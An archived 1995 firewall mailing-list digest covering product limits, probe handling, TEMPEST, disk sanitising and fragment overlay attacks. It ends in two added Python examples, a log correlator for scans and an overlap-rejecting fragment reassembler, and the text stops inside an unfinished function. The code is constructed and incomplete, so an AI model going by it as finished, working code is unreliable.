(Fire)Wall(1) or give up now and wait another year?

I get one or two calls a week from clients who are getting it by default
because "Sun sells it, so it must be the official good firewall product"
(the "buy IBM" approach) and am tired of saying "I can't recommend it,
sorry". Anyone out there want to differ?

*************************************************************************
PGP-- Phil Gets Prosecuted (Persecuted?)
Support the Zimmerman Legal Defense Fund
==> Email: zldf@clark.net    http://www.netresponse.com/zldf
*************************************************************************
INTERNET Installations, Training, Publishing, Security
M.
Strata Rose
408-733-UNIX (8649)
strata@virtual.net
*************************************************************************

From firewalls-owner Fri Aug 4 17:34:19 1995
From: silveira@nutecpa.nutec.tche.br
Date: Fri, 04 Aug 95 21:19:13 -0300
Subject: How to handle ongoing projects?
To: firewalls@greatcircle.com
Message-ID: <9508042116.aa17171@canario.canario.nutecsp.br>

Hello all!

How can we, as consultants, handle the situation when the customer (or our
contacts at the customer) have already begun to use an Internet
connection, but without any security whatsoever and then, after a while,
they call on you to implement a firewall?

It seems to me that we should unplug the network ASAP, and perform a
rigorous examination of the (possibly) compromised network. However, this
often goes against a number of end user expectations.

How are you guys handling it?

Regards,

Fernando

--
Fernando da Silveira Montenegro          E-mail: silveira@nutec.com
Nutec Informatica S.A.
Phone.: +55-11-505-5728
Rua Florida, 1821/4th floor
Fax...: +55-11-505-1918
Sao Paulo, SP BRAZIL 04565-001

From firewalls-owner Fri Aug 4 18:04:22 1995
From: cmcurtin@clipper.cb.att.com
Message-Id: <9508041633.ZM13337@clipper.cb.att.com>
Date: Fri, 4 Aug 1995 16:33:20 -0400
In-Reply-To: "Goetz von Escher" "Tunneling AOL and Compuserve" (Jul 27, 10:17pm)
References: <199506090211.WAA19817@janet.advsys.com> <9507272217.ZM22142@baby>
To: "Goetz von Escher", firewalls@greatcircle.com
Subject: Re: Tunneling AOL and Compuserve

On Jul 27, 10:17pm, Goetz von Escher wrote:
> Before I go and study those protocols and their clients, would anybody
> like to share his experience?

It is rumored that there is a feature in the CompuServe client that allows
the client and server to change roles. *Very* bad if you're doing
tunneling through your firewall. When I asked CompuServe about this, they
simply never replied, even though we had been carrying on a dialogue for
a few days.

When I contacted AOL for information about what DNS names their client
will try to talk to, what ports, etc., and some general info about their
client, I didn't get a reply.
I mailed their postmaster account three times, and once mailed their
technical and zone contact. I got a prompt apology for not getting a
response, a promise for a response, and that's the last that I heard from
them.

As far as I'm concerned, if folks at these sites aren't willing to give me
the information I need, then I'm not willing to provide a means for folks
at my site to be their customers through our firewall here.

--
C Matthew Curtin
AT&T Bell Labs Internet Gateway Applications Group
http://www.att.com/homes/matt_curtin.html
PGP KeyID: cmcurtin@clipper.cb.att.com

From firewalls-owner Fri Aug 4 18:08:18 1995
Message-Id: <199508050053.RAA21717@Csli.Stanford.EDU>
To: silveira@nutecpa.nutec.tche.br
cc: firewalls@GreatCircle.COM
Subject: Re: How to handle ongoing projects?
In-reply-to: Your message of Fri, 04 Aug 1995 21:19:13 -0300. <9508042116.aa17171@canario.canario.nutecsp.br>
Date: Fri, 04 Aug 1995 17:53:13 -0700
From: Christian Wettergren

| How can we, as consultants, handle the situation when the customer (or our
| contacts at the customer) have already begun to use an Internet
| connection, but without any security whatsoever and then, after a
| while, they call on you to implement a firewall?

| It seems to me that we should unplug the network ASAP, and perform a
| rigorous examination of the (possibly) compromised network.
| However,
| this often goes against a number of end user expectations. How are you
| guys handling it?

Easy. Find their unprotected competitor, cook up some fake data, get the
management of your place for a demonstration, fake an attack on their
competitor, the whole attack should take slightly more than one Hollywood
film (say total of 5 min). Show the management the cooked-up data (could
probably be snipped from their annual report), and tell them your service
is available to the competitor as well. (Faking the attack to protect
yourself, of course.)

Only joking, ONLY joking, I said.

I think I'll second that question, but with the added complication of my
case being a University. (And it's not Stanford I'm referring to!)

So, how do you do these things?

/Christian Wettergren

From firewalls-owner Fri Aug 4 20:00:06 1995
From: Alan Hannan
Message-Id: <199508050250.VAA22390@noc1.mid.net>
Subject: Re: How to handle ongoing projects?
To: cwe@Csli.Stanford.EDU (Christian Wettergren)
Date: Fri, 4 Aug 1995 21:50:30 -0500 (CDT)
Cc: silveira@nutecpa.nutec.tche.br, firewalls@GreatCircle.COM
In-Reply-To: <199508050053.RAA21717@Csli.Stanford.EDU> from "Christian Wettergren" at Aug 4, 95 05:53:13 pm

-->| How can we, as consultants, handle the situation when the customer (or our
-->| contacts at the customer) have already begun to use an Internet
-->| connection, but without any security whatsoever and then, after a
-->| while, they call on you to implement a firewall?

With a transparent firewall such as MIDnet's SecurIt, which is based on
TIS's Gauntlet, the installation can be totally painless if:

  1) The internal users are not using UDP to the Internet and
  2) The internal users are willing and able to transfer all of their
     public servers to the outside DMZ

Of course the situation becomes a bit more complex when they are using UDP
or when they demand to have the outside world come into their "protected
network". However, I have to honestly say that most of the organizations
and companies we have worked with have found their users very pleased with
the firewall installation, and extremely happy with the ease of the
transition.

Likewise, I've found that it tends to be a tremendous benefit for the
administrator, as it forces him to understand how his network is laid
out, and what traffic and services his network passes to the Internet.
$0.02

--
Alan Hannan                          Email: alan@mid.net
Network Systems Administrator        Voice: (402) 472-0239
MIDnet, Lincoln NOC Office           Fax:   (402) 472-0240
"Even paranoids have enemies" - Kissinger

From firewalls-owner Fri Aug 4 20:32:54 1995
Date: Fri, 4 Aug 95 23:22:54 -0400
Message-Id: <9508050322.AA28325@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: NCSA

> CARLISLE, Pa.--(BUSINESS WIRE)--Aug. 3, 1995--The National Computer
>Security Assn. (NCSA) has organized the Firewall Product Developers'
>Consortium (FWPD), to bring together the major vendors of network and
>Internet firewall products.

Am sure that they have the same goals for firewalls as they had for viruses.
Warmly,
Padgett

From firewalls-owner Fri Aug 4 21:03:35 1995
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Message-Id: <9508050449.AA21712@hawksbill.sprintmrn.com>
Subject: Re: NCSA
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Date: Fri, 4 Aug 1995 23:49:11 -0500 (EST)
Cc: firewalls@greatcircle.com (Firewalls List)
In-Reply-To: <9508050322.AA28325@uvs1.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Aug 4, 95 11:22:54 pm

>
> > CARLISLE, Pa.--(BUSINESS WIRE)--Aug. 3, 1995--The National Computer
> >Security Assn. (NCSA) has organized the Firewall Product Developers'
> >Consortium (FWPD), to bring together the major vendors of network and
> >Internet firewall products.
>
> Am sure that they have the same goals for firewalls as they had for viruses.
>
> Warmly,
> Padgett
>

That's not saying very much, Padgett, as you well know.
;-)

- paul
_______________________________________________________________________________
Paul Ferguson, US Sprint, Managed Network Engineering, Reston, Virginia USA
tel: 703.689.6828   internet: paul@hawk.sprintmrn.com   http://www.sprintmrn.com

From firewalls-owner Sat Aug 5 01:30:03 1995
From: Amos Shapira
To: strata@virtual.net
Cc: firewalls@greatcircle.com
Date: Sat, 05 Aug 1995 11:16:57 +0300
Subject: Re: Firewall-1 bugs/specifications?

In message you write:
|
| In looking at Firewall-1, it seems that (in the hour+ of messing with
| it) there is no way to allow for things like ftp-data or domain zone
| transfers. I tried to create a service object that would accept requests
| Am I missing something here, like a later release than 1.0.7c? Have
| "I can't recommend it, sorry". Anyone out there want to differ?

I only know about firewalls-1's features from checkpoint's WEB site (URL: http://www.checkpoint.com/). And from what I read there, firewall-1 will automatically open a port number mentioned over an ftp-data connection.
Specifically, look at the following page: http://www2.checkpoint.com:8000/ftp.html (from the "quote of the day" I see there right now it looks like they are watching this mailing list, and the quote, from Marcus J. Ranum, is just about the subject of your question).

Cheers,

--Amos

--Amos Shapira             | "Of course Australia was marked for
133 Shlomo Ben-Yosef st.   | glory, for its people had been chosen
Jerusalem 93 805           | by the finest judges in England."
ISRAEL amoss@cs.huji.ac.il | -- Anonymous

From firewalls-owner Sat Aug 5 01:58:54 1995
From: d
To: firewalls@greatcircle.com
Date: Sat, 5 Aug 1995 01:07:22 -0700
Subject: 2nd CFV: comp.security.firewalls
Organization: Vicious Fishes

Here's your last chance to vote for the firewalls newsgroup; yep or nope or whatever.

***DO NOT SEND YOUR VOTE TO ME!!!***

Follow the directions inside here - send your mail to: "vote@dogwood.com".

-- d

LAST CALL FOR VOTES (of 2)
unmoderated group comp.security.firewalls

Newsgroups line:
comp.security.firewalls   Anything pertaining to network firewall security.

Votes must be received by 23:59:59 UTC, 14 Aug 1995.

This vote is being conducted by a neutral third party. For voting questions only contact Dave Cornejo. For questions about the proposed group contact Dan Farmer. This CFV will also be sent to the mailing list firewalls@greatcircle.com after it has been posted to Usenet.
CHARTER

The purpose of comp.security.firewalls is to serve as a central location in which firewalls can be discussed and investigated. Questions, comments, discoveries, code snippets and new product information can be discussed, among other issues. It will be unmoderated and open to discussion of all aspects of firewalls.

RATIONALE

There is a need for a newsgroup to directly educate, discuss, and propagate information to the Internet community about firewalls, because more and more sites are setting up firewalls, and many people don't understand the technical or philosophical issues, can't spend the time keeping up with the latest information, and don't have a proper forum to discuss new ideas. There is currently no newsgroup which is specifically for this fairly complex subject.

HOW TO VOTE

Send MAIL to: vote@dogwood.com

Just Replying should work if you are not reading this on a mailing list.

Your mail message should contain a subject line with the group name comp.security.firewalls and one of the following statements in the message body:

    I vote YES on comp.security.firewalls
    I vote NO on comp.security.firewalls
    I vote ABSTAIN on comp.security.firewalls
    I vote CANCEL on comp.security.firewalls

You may also ABSTAIN in place of YES/NO - this will not affect the outcome. Anything else may be rejected by the automatic vote counting program. The votetaker will respond to your received ballots with a personal acknowledgement by mail - if you do not receive one within several days, try again. It's your responsibility to make sure your vote is registered correctly.

One vote counted per person, no more than one per account. Addresses and votes of all voters will be published in the final voting results list. Votes from anonymous and system accounts will not be accepted. Votes mailed from WWW/HTML/CGI forms are also not acceptable. Fraudulent votes will be deleted from the results. Votes received at an address other than vote@dogwood.com will not be counted.
BOUNCED ACKNOWLEDGEMENTS

If your email address appears below then your vote acknowledgement was bounced back to the vote taker - there is no need to vote again.

    UDSD007@DSIBM.OKLADOT.STATE.OK.US
    mauer@fsd.com
    itkat@cix.compulink.co.uk
    ghigi@iper.net
    jnewman@hazel.EnGarde.com
    jbs@nirvana.cr.mci.com
    Warren_Moore%CBIS@notes.cbis.com
    ghigi@iper.net

From firewalls-owner Sat Aug 5 08:00:06 1995
From: Bob Snyder
To: quito@constructa.cl (Francisco Javier cabezas)
Cc: Firewalls@GreatCircle.COM
Date: Sat, 05 Aug 1995 10:42:45 -0400
Subject: Re: about ipfwadm in Linux

> I need to know something about IPFWADM....
>
> What are "the blocking rules", "the forwarding rules" and
> "the IP accounting rules"???
> What do they mean?

My understanding (which may not be correct) is that the accounting rules simply set up counters for packets that fit the rule defined, the forwarding rules control what packets will be forwarded from one interface to another, and the blocking rules control what will be allowed access to the local machine.
Bob

From firewalls-owner Sat Aug 5 08:30:09 1995
From: wallynet@panix.com (Walter F. Inetman)
To: firewalls@greatcircle.com
Date: Sat, 05 Aug 1995 10:43:38 -0400
Subject: Build a real firewall... Recycle SecurID/Retina/DNA try the ATF -w- EEG's and universal passports

Hey Padgett, Brian and the other PhDs:

If you think this is off topic try again... Protection systems have resulted from unwanted intrusion, ya? Polymorphism resulted from ____ ???

Today on CNN, the question of whether or not cognisance of deviant behavior makes you suspect for further investigation is no longer an issue. Being aware of hacking methodology makes YOU suspect! As your counsel will advise you: unless you get pulled over for a vehicle violation, or some other idiocy, in the USA you can not be randomly interrogated. Your mind is your sovereign property; however, access to your thoughts via bio-technology (enhanced EEG), i.e. Skipjack infiltration, is now legal with precedents.

No sweat, all the major anti hackers can protect themselves with a bullet proof FIREWALL. NOT!!!
The question is: Did Jefferson intend the authority of the law (including current US Code Statutes) to have the authority to probe your bio-rhythms and extrapolate potential guilt? Hymmmm....

PS: If this were an editorial there would be a solution. In this case, I think not! Please, let some legal eagle kill this trash before manufacturers are encouraged to distribute computers with capacitance sensors in their keyboards. The challenge for developers to counter information theft is apparent. The requisite is clear and the time is now. Then again big brother might not be such a bad thing....

---
Walt

Ultimately, the strongest argument for the people to retain the right to keep and bear arms, is to protect themselves against tyranny in government. --Thomas Jefferson

RE:
gopher://uacsc2.albany.edu:70/00/newman/crjdoc/engwale.doc
http://www.pls.com:8001/his/95.htm
gopher://hamilton1.house.gov/11d:/uscode/title18
gopher://wiretap.spies.com:70/00/Gov/US-State/compcrime.tx
http://io.com/SS/texaslaw.html

Those of us who are in Boston 8-7/8-8 (AYRIEE!!!) or in Europe (CAIO...) [the rest of you get a life] wear your sunglasses on your head B:-) .

"This guy here. He's a troublemaker. Always sticking his nose into how things like government, media, ads, PR, etc works."

"Damn it Jim!, I'm Warf not a Doctor!"
From firewalls-owner Sat Aug 5 10:00:09 1995
From: "Steve P. Devore"
To: firewalls@greatcircle.com
Date: Sat, 05 Aug 1995 11:31:39 -0600
Subject: Re[2]: Someone knocking at our door... -Reply

I agree. I am concerned that a smart cracker would not try everything in the book at each site he goes to. He would instead try one thing, and if that didn't work move on. That way it would be real easy to dismiss it as harmless, although this person could be spending hours a day logging into site after site until he finds an unprotected one. If we give a short note to the postmaster it can alert them to the problem.

>>> Bierdz, Philip 8/1/95, 11:52am >>>
I don't believe so. I'd contact the postmaster anyway (if you feel it was a valid probe). Being a postmaster myself, I'd like to know if a user was suspect of such a thing from any site. If I got enough calls from other sites with the same user as being "suspect"... I think we all get the point.

----------------------------------------------------------------------
Philip J. Bierdz
Senior Systems Support Specialist
Moraine Valley Community College
Palos Hills, IL - USA
bierdz@moraine.cc.il.us
============DISCLAIMER============
My opinions are not necessarily my own but those of my employer
----------------------------------------------------------------------

From firewalls-owner Sat Aug 5 12:00:01 1995
From: Edward Maillet
To: firewalls@greatcircle.com
Date: Sat, 5 Aug 1995 14:42:06 -0400 (EDT)
Subject: Packet sniffers in the DMZ. Do you sniff?

Hey all,

I was wondering how many firewallers use packet sniffers to suck ALL packets on their DMZ segment or other "outside" net. Anyone know of a good DOS/Win/Win95 packet sucker with decent analysis/report generation capabilities?
Here's the environment I'm thinking about:

Internet ------>[Router]----DMZ-----[Firewall]-----Inside
                             |                       |
                             |                       |
                             |                    [Sniffer]
                             |
                             |--[WWW etc]
                             |
                             |--[Sniffer]

-----
Ed Maillet
maillet@usmcs.maine.edu

From firewalls-owner Sat Aug 5 12:33:50 1995
From: Sick Puppy
To: firewalls@GreatCircle.com
Date: Sat, 5 Aug 1995 15:14:48 -0400 (EDT)
Subject: And now for something completely different

On the assumption that no reference is going to be made to any agency of any government, does anyone know of a firewall being successfully hacked with the help of equipment designed to receive, synchronize and display van Eck radiation?

My dad, who is a history buff and still supports the Military - bless his stoopid heart, says that back in the sixties some military cryptography equipment leaked clear text on van Eck radiation bands so strongly that the places the machines were installed in had to have special shielding. That leads me to ask, is anyone running firewalls on Tempest class equipment?
If you don't know what van Eck radiation is, then: 1) your government (regardless of country) does not want you to know; 2) you can follow the advice of the Alt.2600.FAQ and read chapter 7 of Information Warfare by Winn Schwartau, published by Thunder's Mouth Press, New York, ISBN 1-56025-080-1, which explains what it is.

Lieutenant Sick Puppy the Cat_Eating_Dawg
Photonics & Tachyonic Systems Engineer of the Stealth Starship Dark Matter

From firewalls-owner Sat Aug 5 14:30:41 1995
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Date: Sat, 5 Aug 95 16:53:59 -0400
Subject: ...It's Barnacle Bill the sailor.

Subj: Re[2]: Someone knocking at our door... -Reply

Phillip rote:
> I agree. I am concerned that a smart cracker would not try
> everything in the book at each site he goes to. He would instead try
> one thing, and if that didn't work move on.

True that could be the mark of the generic haquer drifting aimlessly from site to site, but would not happen if the intruder were either professional or dedicated. For instance an attack on Toxic Waste R Us would not begin electronically: it would most likely start with a job interview, someone hiring in as a temp, someone taking a job with the computer maintenance outsourcer, or even as a janitor.
That way, when the first electronic probe starts, knowledge of just how to go about it will already be there.

Of course, if all you are worried about are kids...

(Sorry, been a rough day)

Warmly,
Padgett

From firewalls-owner Sat Aug 5 14:55:28 1995
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Date: Sat, 5 Aug 95 17:05:58 -0400
Subject: ANFSCD

Sick Puppy rites:
> My dad, who is a history buff and still supports the Military - bless his
> stoopid heart, says that back in the sixties some military cryptography
> equipment leaked clear text on van Eck radiation bands so strongly that
> the places the machines were installed in had to have special shielding.

Red/Black says it all. In the sixties *everything* radiated (the relays in real TTYs were particularly loud) and that is why we have Faraday Cages and certain buildings are copper clad. It's really not a very interesting subject (inverse square gets you in the end) and if you doubt my capability to say that either ask Winn or look in the IW index 8*).

Of course, in my worldview you do not try to hide, you swamp (amazing what you can do with an HP 8601A and a linear).

And now back to firewalls & other perimeter defenses.
Warmly,
Padgett

From firewalls-owner Sat Aug 5 16:02:08 1995
From: mjr@iwi.com
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Cc: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com
Date: Sat, 5 Aug 95 18:31:56 -0400
Subject: Re: ANFSCD

A. Padgett Peterson, P.E. Information Security writes:
> Red/Black says it all. In the sixties *everything* radiated (the relays in
> real TTYs were particularly loud) and that is why we have Faraday Cages and
> certain buildings are copper clad.

A good reference for this sort of thing is Peter Wright's "Spycatcher" (which is an interesting book in general if you want a jaundiced view of the entire spook mind-set). Wright describes some of the fun various folks had trying to read internal video monitors from across the street, etc. This was all in the '60s.

The whole "Information Warfare" notion has gotten massively overhyped. It's just a zangy new buzz word for military intelligence as usual. It sure sounds sexy, though. :)

Nowadays it's offensive information warfare to give the folks at Radio Shack the wrong address when you buy something, and it's defensive information warfare to have an unlisted phone number. :)

mjr.
From firewalls-owner Sun Aug 6 01:30:02 1995
From: Darren Reed
To: mischler@Cubic.COM (Dave Mischler)
Cc: mulligan@incog.com, firewalls@greatcircle.com
Date: Sun, 6 Aug 1995 18:05:25 +1000 (EST)
Subject: Re: established keyword vs. firewall-1 again

In some mail from Dave Mischler, sie said:
>
> > This isn't quite true. Unless the product implements some type of frag
> > cache and only passes fragment trailers matching a passed fragment header,
> > it's still possible to use the fragment overlay attack.
>
> You're absolutely right. I have to point out though, that any product
> that translates IP addresses and/or port numbers must either reassemble
> fragments or maintain a fragment cache or the fragments can't be delivered
> to the correct internal address and port.

I've given this some thought, and it isn't quite correct. Translating port numbers is best solved using a proxy (circuit relay). However, the case for IP#s is different. The packet (and all its fragments) are uniquely identified within a given time span by (source ip, destination ip, id#). It should not be necessary to maintain a fragment cache for translating IP#s.
But in any case, it doesn't matter whether there is a cache or not; if the reassembly routine is wrong, a fragment can overwrite previous data and invalidate it (and your filter results).

darren

From firewalls-owner Sun Aug 6 12:14:44 1995
From: nabadm@odo.acdnj.itt.com (set chaos/total)
To: firewalls@greatcircle.com
Date: Sun, 6 Aug 1995 10:11:49 -0400
Subject: Re: Sanitizing SCSI disks

> Use Norton Wipedisk. Overwrite three times... that'll clear the media enough
> so that it can be deemed "unclassified." However, it *STILL* must remain in
> the DOD inventory for two years being *USED* in an unclassified mode before
> it can be released to the public. (The destruction certificate must also
> remain with the computer for two years.)
> This is approved up to and including TS.

That may have been true under the ISM, but the ISM has now been superseded by the NISPOM. According to the NISPOM "Clearing and Sanitization Matrix", pages 8-3-5 and 8-3-6, it is no longer possible to sanitize TS. All TS material must be destroyed. (NISPOM stands for "National Industrial Security Program Operating Manual". ISM stands for "Industrial Security Manual".)
-------------------------------------------------------------------------------
"Crisis over, back to panic mode!"
-------------------------------------------------------------------------------
N.A. Bogart                          nabadm@odo.acdnj.itt.com
OpenVMS & Security Systems Manager   bogart@itt.com
ITT Avionics                         (201) 284-5117 VOICE(MAIL)
100 Kingsland Road                   (201) 284-3947 FAX
Clifton NJ 07014                     (201) 730-2681 PAGER
-------------------------------------------------------------------------------

From firewalls-owner Sun Aug 6 12:16:39 1995
From: nabadm@odo.acdnj.itt.com (set chaos/total)
To: firewalls@greatcircle.com
Date: Sun, 6 Aug 1995 10:35:44 -0400
Subject: Re: InfoSec policies made easy?

> The price is (or at least *was*) US$495. If the general feeling is a
> positive one, I'll post The Gory Commercial Details. :P

Consider this a positive response!

-------------------------------------------------------------------------------
"Crisis over, back to panic mode!"
-------------------------------------------------------------------------------
N.A. Bogart                          nabadm@odo.acdnj.itt.com
OpenVMS & Security Systems Manager   bogart@itt.com
ITT Avionics                         (201) 284-5117 VOICE(MAIL)
100 Kingsland Road                   (201) 284-3947 FAX
Clifton NJ 07014                     (201) 730-2681 PAGER
-------------------------------------------------------------------------------

From firewalls-owner Sun Aug 6 12:30:00 1995
From: wayne@keyman.Sygma.NET (Wayne Godbehere)
To: paul@turbosoft.com.au
Cc: Firewalls@GreatCircle.com, tech@keyman.Sygma.NET, security@keyman.Sygma.NET, customer_service@keyman.Sygma.NET
Date: Sun, 6 Aug 1995 08:53:39 -0400
Subject: Re: TCP port 709 - any details?

Paul, you recently queried:
> We've recently been probed - first ICMP
> echos to all possible IP numbers to see what was active, then a
> day later two machines were probed via TCP. Along with the
> normal ports probed, an attempt was made to connect to TCP port 709.
> Sure enough, our inetd is listening to 709.
> RFC 1700 lists this port
> as 'entrustmanager' - does anyone have any further details on what
> this port does/can be (mis)used for? (SunOS 4.1.1 if it matters).
> I don't think anything was compromised, but I'd _really_ like to
> find out what could have been done through this port.
>
> Any information gratefully received.

NorTel Secure Networks has a workstation-to-workstation desktop security product based on public-key encryption/MD5 hashing/digital signature which has a few server components. One of these is Entrust/Server, another is Entrust/Manager and the final one is Entrust/X.500.

The Entrust/Server has a daemon which listens for Entrust/Client traffic (tcp/+389) and then launches a process which establishes a reply channel with the client on a high numbered port (tcp/>+1024). If the nature of the Entrust/Client transactions requires actions from the Entrust/Manager process, then a secure session (using DES encryption) is established between the Entrust/Server and Entrust/Manager processes (which may reside on separate or the same physical machine). THIS TRAFFIC IS EXCLUSIVELY ON TCP/+709.

There is no need for any external communication to port tcp/+709 unless you are running Entrust with Entrust/Manager and Entrust/Server on different sides of a firewall. You should block and log all attempts to access tcp/709 --- it should be assumed that this was truly an unfriendly probe!

I hope this helps. By the way if you would like to get more information on Entrust please send me a request by e-mail at wayne@keyman.Sygma.NET.

Wayne Godbehere
wayneg@io.org
Bell Sygma - Secure Services
"Opinions expressed are my own and do not necessarily reflect those of my associates nor employers."
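The pattern Paul reports (ICMP echos across the whole address range, then TCP connects to two hosts a day later with tcp/709 among the ports) and the "one try per site, easy to dismiss" worry from the "Someone knocking at our door" thread both come down to correlating denied packets by source address over several days. The following is an added example, not code from this thread or from any product mentioned in it: the log line format, the "router" host name, the addresses and the eight-host sweep threshold are all constructed for the example.

```python
"""Correlating denied packets by source across days (constructed example)."""
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, List, Optional, Set, Tuple

# Constructed log line format for this example, not any real router's syntax:
#   <Mon> <day> <HH:MM:SS> <host> deny <proto> <src>[:<sport>] -> <dst>[:<dport>] [<note>]
LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ deny "
    r"(?P<proto>icmp|tcp|udp) (?P<src>[\d.]+)(?::(?P<sport>\d+))? -> "
    r"(?P<dst>[\d.]+)(?::(?P<dport>\d+))?(?: (?P<note>.*))?$"
)

# Ports the thread singles out. RFC 1700 lists 709 as 'entrustmanager'; per the
# reply above it carries only Entrust/Server <-> Entrust/Manager traffic, so an
# outside connection attempt to it has no legitimate explanation.
WATCH_PORTS = {709: "entrustmanager (Entrust/Server <-> Entrust/Manager only)"}


@dataclass
class SourceReport:
    src: str
    first_seen: datetime
    last_seen: datetime
    echo_targets: Set[str] = field(default_factory=set)
    tcp_ports: Dict[str, Set[int]] = field(default_factory=dict)  # dst -> ports tried
    watched_hits: List[Tuple[str, int, str]] = field(default_factory=list)

    def is_sweep_then_probe(self, min_hosts: int = 8) -> bool:
        """Echo sweep of many hosts followed by TCP connects (threshold is arbitrary)."""
        return len(self.echo_targets) >= min_hosts and bool(self.tcp_ports)

    def summary(self) -> str:
        """Short text for the note to the remote postmaster that the thread recommends."""
        span = f"{self.first_seen:%b %d %H:%M} to {self.last_seen:%b %d %H:%M}"
        probes = sum(len(p) for p in self.tcp_ports.values())
        lines = [f"{self.src}: {len(self.echo_targets)} hosts pinged, {probes} TCP probes, {span}"]
        for dst, ports in sorted(self.tcp_ports.items()):
            lines.append(f"  tcp -> {dst}: {sorted(ports)}")
        for dst, port, why in self.watched_hits:
            lines.append(f"  ** {dst}:{port} is {why}")
        return "\n".join(lines)


def parse_line(line: str, year: int) -> Optional[Tuple[datetime, str, str, str, Optional[int], str]]:
    """Return (when, proto, src, dst, dport, note), or None for a line in another format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    when = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
    dport = int(m["dport"]) if m["dport"] else None
    return when, m["proto"], m["src"], m["dst"], dport, m["note"] or ""


def analyze(lines: List[str], year: int = 1995) -> Dict[str, SourceReport]:
    """Group denied packets by source. Every source gets a report, even one with a
    single attempt: the careful intruder tries one thing per site and moves on, and
    only correlation across sites (hence the note to the postmaster) exposes that."""
    reports: Dict[str, SourceReport] = {}
    for line in lines:
        parsed = parse_line(line, year)
        if parsed is None:
            continue
        when, proto, src, dst, dport, note = parsed
        r = reports.get(src)
        if r is None:
            r = reports[src] = SourceReport(src, when, when)
        r.first_seen, r.last_seen = min(r.first_seen, when), max(r.last_seen, when)
        if proto == "icmp" and note.startswith("echo"):
            r.echo_targets.add(dst)
        elif proto == "tcp" and dport is not None:
            r.tcp_ports.setdefault(dst, set()).add(dport)
            hit = (dst, dport, WATCH_PORTS.get(dport, ""))
            if dport in WATCH_PORTS and hit not in r.watched_hits:
                r.watched_hits.append(hit)
    return reports


# Constructed sample: an echo sweep of ten hosts on Aug 4, TCP probes of two of
# them a day later (709 among the ports), and one unrelated single attempt.
SAMPLE_LOG = [
    f"Aug  4 10:15:{i:02d} router deny icmp 203.0.113.7 -> 192.0.2.{i} echo" for i in range(1, 11)
] + [
    "Aug  5 11:02:33 router deny tcp 203.0.113.7:4410 -> 192.0.2.10:21 syn",
    "Aug  5 11:02:34 router deny tcp 203.0.113.7:4411 -> 192.0.2.10:23 syn",
    "Aug  5 11:02:35 router deny tcp 203.0.113.7:4412 -> 192.0.2.10:25 syn",
    "Aug  5 11:02:36 router deny tcp 203.0.113.7:4413 -> 192.0.2.10:709 syn",
    "Aug  5 11:03:01 router deny tcp 203.0.113.7:4420 -> 192.0.2.11:25 syn",
    "Aug  5 11:03:02 router deny tcp 203.0.113.7:4421 -> 192.0.2.11:709 syn",
    "Aug  5 23:40:12 router deny tcp 198.51.100.5:1027 -> 192.0.2.10:23 syn",
]

if __name__ == "__main__":
    for report in analyze(SAMPLE_LOG).values():
        print(report.summary(), end="\n\n")
```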
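Going back to Darren Reed's point a few messages up: if the reassembly routine lets a later fragment overwrite bytes already accepted, the decision a filter took on the first fragment is worthless. What follows is an added example, not code from this thread or from any of the products discussed in it. It keys fragments by (source ip, destination ip, id) as Darren describes and discards the whole datagram on any overlap; offsets are in bytes rather than IP's 8-octet units, there is no reassembly timeout, and the addresses and payloads are constructed, all of which are simplifications for the example.

```python
"""Overlap-rejecting fragment reassembly (constructed example)."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

FlowKey = Tuple[str, str, int]  # (source ip, destination ip, id), as in the thread


@dataclass(frozen=True)
class Fragment:
    src: str
    dst: str
    ident: int     # IP identification field
    offset: int    # byte offset of this payload within the datagram (bytes, not 8-octet units)
    more: bool     # True for every fragment except the last (the MF flag)
    payload: bytes


@dataclass
class _Pending:
    pieces: Dict[int, bytes] = field(default_factory=dict)  # offset -> payload
    total: Optional[int] = None  # datagram length, known once the MF=0 fragment arrives


class Reassembler:
    """Reassembles datagrams keyed by (src, dst, id).

    A fragment whose byte range overlaps anything already held for that key is
    treated as malformed: the key is dropped and the event recorded, so a filter
    decision taken on the first fragment can never be rewritten by a later one.
    Byte-identical retransmissions are refused too; a production stack would
    compare and accept them.  Pending state has no timeout in this example.
    """

    def __init__(self) -> None:
        self._pending: Dict[FlowKey, _Pending] = {}
        self.rejected: List[Tuple[FlowKey, str]] = []

    def _reject(self, key: FlowKey, reason: str) -> None:
        self.rejected.append((key, reason))
        self._pending.pop(key, None)
        return None

    def add(self, frag: Fragment) -> Optional[bytes]:
        """Accept one fragment; return the whole datagram once it is complete."""
        key = (frag.src, frag.dst, frag.ident)
        if not frag.payload:
            return self._reject(key, "empty fragment")
        p = self._pending.setdefault(key, _Pending())
        start, end = frag.offset, frag.offset + len(frag.payload)
        for s, data in p.pieces.items():
            e = s + len(data)
            if start < e and s < end:  # any shared byte is an overlay attempt or a bug
                return self._reject(key, f"[{start},{end}) overlaps [{s},{e})")
        if p.total is not None and end > p.total:
            return self._reject(key, "data past the last fragment")
        if not frag.more:
            if p.total is not None:
                return self._reject(key, "second last fragment")
            if any(s + len(d) > end for s, d in p.pieces.items()):
                return self._reject(key, "earlier data past the last fragment")
            p.total = end
        p.pieces[start] = frag.payload
        if p.total is None:
            return None
        pos = 0  # complete only when the pieces tile [0, total) with no gap
        for s in sorted(p.pieces):
            if s != pos:
                return None
            pos += len(p.pieces[s])
        if pos != p.total:
            return None
        del self._pending[key]
        return b"".join(p.pieces[s] for s in sorted(p.pieces))


def demo() -> Tuple[Optional[bytes], List[Tuple[FlowKey, str]]]:
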